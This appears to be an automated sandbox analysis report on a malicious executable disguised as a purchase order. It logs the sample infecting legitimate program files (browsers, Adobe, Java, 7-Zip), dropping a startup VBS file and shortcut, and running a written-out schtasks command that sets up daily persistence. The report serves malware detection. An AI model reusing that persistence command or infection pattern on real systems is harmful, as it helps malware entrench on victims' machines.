Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\server01.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00ADCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00ADCBD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Users\user\AppData\Roaming\90fdfad63d8f4c72.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Users\user\AppData\Local\Temp\aut7AD4.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Users\user\AppData\Local\Temp\aut7AD4.tmp offset: 344064	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Users\user\AppData\Local\Temp\uncolorable offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
